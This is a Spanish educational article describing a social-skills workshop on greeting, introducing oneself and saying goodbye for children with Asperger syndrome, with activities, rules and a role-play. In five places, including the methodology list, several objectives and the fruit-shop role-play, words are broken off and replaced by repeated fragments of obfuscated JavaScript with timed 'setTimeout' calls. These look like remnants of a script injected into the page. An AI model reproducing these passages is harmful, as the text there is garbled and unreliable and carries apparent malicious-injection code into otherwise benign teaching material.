TALLER DE HABILIDADES SOCIALES EN NIÑOS CON SÍNDROME DE ASPERGER

Autora: María Barquero Paz

          Siguiendo los principios de Integración y Normalización que deben regir todo aspecto de la vida de las personas con discapacidad, es necesario plantearse una serie de objetivos y actividades que mejoren considerablemente su calidad de vida.

           En el caso de las personas con TEA, estos objetivos se dirigirán a fomentar las relaciones interpersonales, la flexibilidad y la comunicación, que son las áreas en las que presentan mayores deficiencias.

           A través del taller de habilidades sociales, los chicos interiorizan las pautas adecuadas para establecer y mantener relaciones afectivas idóneas. Se trabajan aspectos que desde el punto de vista de un niño de su edad son obvios y que, sin embargo, desde la perspectiva de un joven con Síndrome de Asperger son tremendamente complejos, por lo que precisan directrices para entender un modo de actuar socialmente aceptable.


            Los principios metodológicos en los que está basada la intervención son los siguientes:

  • Adopción de un vocabulario adaptado al nivel de los niños.
  • Se abordarán no solo aspectos funcionales sino también emocionales.
  • Utilización de mensajes concretos, con ayudas visuales.
  • Creación de un ambiente cálido y natural en el que los chicos se sientan a gusto, evitandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando propiciar situaciones que les pongan tensos.
  • Utilizar el apoyo visual en todas las actividades que lo requieran. 

           Las sesiones de grupo se inician siempre con una agenda que planifica la sesión. Esta agenda se construye entre todos. La agenda siempre tiene la misma estructura: En primer lugar HABLAR; en segundo lugar, RECORDAR LA SESIÓN ANTERIOR; en tercer lugar se desarrollaría la ACTIVIDAD FUNDAMENTAL DE LA SESIÓN y, por último,  JUGAR.


 

A continuación voy a describir la sesión: “Saludo, presentación y despedida”.

  Los aspectos que se van a trabajar son los siguientes:

  • Saludar de forma adecuada, utilizandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando formas verbales de saludo.
  • Mirar a la cara y hacer los gestos adecuados de saludo: dar la mano, dar un beso, un abrazo, sonreír, etc.
  • Presentarse, identificándose ante personas desconocidas y en las situaciones adecuadas.
  • Presentar a sus acompañantes diciendo su nombre.
  • Utilizar las fórmulas típicas de presentación (“te presento a”) y respuesta a la presentación (“encantado de conocerte”).
  • Mantener la distancia apropiada cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando habla con otras personas, para lo cual es necesario:
    • Discriminar la distancia adecuada según las personas.
    • Permanecer en esa distancia mientras hablas.
    • Mantener el contacto ocular.
  • Despedirse de personas de forma adecuada utilizandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando gestos y fórmulas de despedida de modo correcto.
  • Identificar distintas situaciones en las que se efectúen despedidas

  

Para ello se plantan a los niños las siguientes actividades:

          -Relaciona cada saludo y despedida con la situación en la que lo utilizarías: Se presentará a cada niño una ficha en la que aparecerán diferentes saludos y despedidas dentro de bocadillos. Por otra parte, se les entregará otra ficha, en la que aparecerán variadas situaciones en las que se utilizan estos saludos y despedidas. Tendrán que recortar estos bocadillos y pegarlos junto a la situación que corresponda.

           -Lee y aprende las siguientes normas de saludo, presentación y despedida: Se presentan a los niños, escritas en una cartulina, las normas necesarias para saber presentarse, saludar y despedirse de manera adecuada en cualquier situación. A continuación, tendrán que leerlas varias veces, para comprenderlas e interiorizarlas. Por último, comentaremos las normas todos juntos.  

NORMAS DE SALUDO, PRESENTACIÓN Y DESPEDIDA: 

  1.  AL LLEGAR A CUALQUIER SITIO TENEMOS QUE SALUDAR.
  2.  NO SALUDAMOS DE IGUAL MODO EN TODAS PARTES. DEPENDERÁ SI SON PERSONAS QUE CONOCEMOS O SON PERSONAS DESCONOCIDAS.
  3.  SI ESTAMOS CON PERSONAS DESCONOCIDAS, DESPUÉS DE SALUDAR DEBEMOS  PRESENTARNOS.
  4. CUANDO NOS PRESENTEMOS BASTARÁ CON DECIR NUESTRO NOMBRE.
  5. ANTES DE IRNOS DEBEMOS DESPEDIRNOS DE LAS PERSONAS CON LAS QUE HEMOS ESTADO.

 

 

          -Role-Playing: los niños tendrán que representar diferentes situaciones, a través de las cuales aplicarán los conceptos aprendidos acerca del saludo, la presentación y la despedida. Se les presentarán tres sobres cerrados con las situaciones dentro. Cada uno cogerá al azar un sobre y tendrá que representar la situación que le ha tocado. Por ejemplo, uno de los sobres tendrá esta información: 

Juan tiene que ir a comprar a la frutería dos kilos de naranjas. Al entrar saluda al frutero, espera su turno para comprar y, cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando termina de comprar, se despide del frutero.

 * ¿Es necesario que Juan se presente?


 

 

Bibliografía: 

  • Consejería de Educación de la Junta de Andalucía (2006): Guía sobre trastornos de Espectro Autista. Volumen 2: El síndrome de Asperger. Respuesta educativa.  Editado por la Consejería de Educación.
  •  Equipo DELETREA. Equipo Asesor Técnico de Asperger España (2004): Un acercamiento al Síndrome Asperger: una guía teórica y práctica. Editado por la Asociación Asperger España.
 

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